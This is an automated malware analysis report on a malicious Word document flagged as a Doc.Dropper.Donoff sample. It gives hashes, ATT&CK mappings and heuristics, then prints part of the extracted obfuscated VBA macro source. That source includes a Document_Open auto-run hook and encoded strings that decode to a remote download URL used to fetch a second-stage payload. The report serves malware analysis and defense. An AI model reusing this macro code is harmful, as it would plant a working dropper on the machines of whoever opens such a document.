Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f7e706f377d7565a…

MALICIOUS

Office (OLE)

Size: 139.0 KB
Created: 2016-06-01 23:34:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 7b0b0c54ac3fcc3ee3780dbc6fc00435
SHA-1: 4182a987c37e034c056b759f579243acd3413457
SHA-256: f7e706f377d7565a97308f38a4f930653c43e4af2b2526e76b3ef6f408d9b8ec
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The critical ClamAV detection and high-severity heuristics for VBA macros, including the presence of a Document_Open auto-execution macro, indicate malicious intent. The VBA script likely attempts to download and execute a second-stage payload, as suggested by the CreateObject and CallByName calls. The benign URLs extracted are likely unrelated to the malicious functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17234 bytes
SHA-256: 38dbd9c7ecc3f7606d0ab7df0945b80874ec8fbd8923d0448f73b2a5b59c624e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function KysCHNNe(ByVal ZGJyg As Integer) As String
tXcQRtut
lpbERSNDaxbdz 8198
If nHOgf(8828, "5sU") Then
GfaYzzMsurWVdo
AlyOxOv = 7276
vxXdW 4905, "FkZtH"
trBtKu
End If
QWLYuW = "csaG5"
KysCHNNe = "h7k"
End Function
Private Function dHayHlT() As Integer
wRaflnQ False
aIyhOsJlLqfCA 2233, "4w"
FQUxKCsRYLax
dHayHlT = 5204
End Function
Private Function nlnCg() As String
If WnWgMAA(9126) Then
EWWqQFGGualdgn = 8634
FALunEdW
Else
Qjcms True
mjWQtMhc
TGSPgqPkBJfdU
End If
WysHtTTvXnTz = True
nlnCg = "XAFCg"
End Function
Private Sub Document_Open()
jexAq.uZKpyqK
End Sub
Private Function KwHTrWyzJrqeH(ByVal qXqbeKJmt As String, ByVal taShrg As Integer) As Integer
tJklVbuPVVOzZT 4374
IKBqnI
ClFiIUjErv
If IqcBZLOVA Then
PrNZEFC
Else
genNnCjjzMYU = ""
aYYdzK
rEpFvUYkqAJdB
End If
KwHTrWyzJrqeH = 1337
End Function

Attribute VB_Name = "jexAq"
Private Function TMJtcLA(ByVal ynRTPigUZ As Object, ByVal ZSscjIRoMc As Boolean) As Object
Dim IHmiJeBYEeXI As Integer
iYSPr = False
Set TMJtcLA = ynRTPigUZ
End Function
Public Sub uZKpyqK()
On Error GoTo cvTtINY
tjIFDR.rowApbhdHCX
kHpWGdqXemY = True
tjIFDR.LXhuBkU
WtKSSwKXN
Exit Sub
TnHbSltZaJT = 5724
cvTtINY:
End Sub
Private Sub WtKSSwKXN()
Dim OYITvCasYKDprC As String
Dim aLTXD As Integer
VrsODYtIY = ""
uTDEJGFB 5737, ZLNDgtANuHa.eLdPmJO, ILJiVekrtzaF.nyPHmxZmMLbl("hBXtBtpF:L/GB/XboTTlLhaOLpHiaXcT.TGeLuv/cXaGtvaFlvTovg/BoFOffOiLcveOG12v.XdXFatG", "LHTOvAFBXGJ")
PQacjcrY = 6867
ZLNDgtANuHa.fhKjKlfKxlsj 6258, ZLNDgtANuHa.eLdPmJO
End Sub
Public Function scZUqkxFLSkeAB(ByVal laXxuzjRjeMC As String) As Object
Dim pJoclwRSoeqp As String
Dim oINsWXdeCmAh As Boolean
KAlINwEx = "aLv0"
Set scZUqkxFLSkeAB = TMJtcLA(CreateObject(laXxuzjRjeMC), True)
End Function
Private Function qgLXZbV(ByVal GZXghsOVe As String) As Integer
If fIwVcmoC(8404, "TQ") Then
ACZBE = 7354
OdOIc
pKyuLRBpb
EEeJREForiBFF
reNRGMoj = "X3w"
Else
WkaVSJbFkFE
AbdbiXOFQxxyt "fmN", 4897
gXhyNzAuIBNBIO
End If
YnlwGZU 4147, 3708, 9625
qgLXZbV = 2465
End Function
Private Sub uTDEJGFB(ByVal biZnMnBOVW As Integer, ByVal fesfoMyDhRl As String, ByVal nxTEQ As String)
Dim OyVIWQFS As Integer
Set dhXMABZ = lGmZKwAXr.qiEPXjuv(nxTEQ, 7913, True)
lGmZKwAXr.qAMemkBN "g8oX2", RtcSzUCfqYe, 3895, dhXMABZ
RDhbxYKEqVnR = True
ZLNDgtANuHa.RCsVbLm 6655, ZlwGqufW.voUTMy(2621, dhXMABZ, "Dg8MT", ILJiVekrtzaF.nyPHmxZmMLbl("RFiesZNpToZnsOOeBDoFdZyq", "FYODTNiZq")), "amc", fesfoMyDhRl
End Sub
Private Function RtcSzUCfqYe() As String
RtcSzUCfqYe = ILJiVekrtzaF.nyPHmxZmMLbl("CLa4nKL'tK L/doKw/nLl.oLa.dKK bKiKLnqaYry4 /RfiL/leq", "RKL4q./Y")
End Function

Attribute VB_Name = "ILJiVekrtzaF"
Private Sub PBrUm()
qteMwvl False, 4187, False
zKKSyhwO 3928, True, 3091
End Sub
Public Function teaAxNrDYanFS(ByVal pNKEExsGoh As String, ByVal MMQCgrDnwefQ As Boolean, ByVal idkLvmk As String) As String
Dim frdDAZ As Boolean
Dim jIYZpA As Integer
sIPNszKNf = "4Plps"
teaAxNrDYanFS = pNKEExsGoh & idkLvmk
End Function
Private Sub KtmRAadF()
SzETBIuecVGeS 3835, "Kph9x", 8764
cLFbb 5484, 760, 7177
IoVnIyysRI = 3182
AOsfcpuLswR
End Sub
Private Function elUhjPn(ByVal gOnYMY As String, ByVal pWEpk As String) As String
If Not wWDvWemQb.elczPK("", pWEpk, gOnYMY, "aQ") Then
elUhjPn = pWEpk
End If
End Function
Private Function QzBWFlE() As Integer
iKOZTim = "z2tY"
QzBWFlE = 1
End Function
Public Function nyPHmxZmMLbl(ByVal StdRFlF As String, ByVal CqHJDzZ As String) As String
Dim mYspRohMtjn As String
Dim kNECCP As String
Dim KUpCKggnJsemRI As Integer
For lUYYw = QzBWFlE To wWDvWemQb.OIMWMEeNzjLuHI(StdRFlF)
mYspRohMtjn = elUhjPn(CqHJDzZ, wWDvWemQb.vsdTsohsHoPG(StdRFlF, 9996, lUYYw, True))
nyPHmxZmMLbl = teaAxNrDYanFS(nyPHmxZmMLbl, True, mYspRohMtjn)
Next
End Function

At
... (truncated)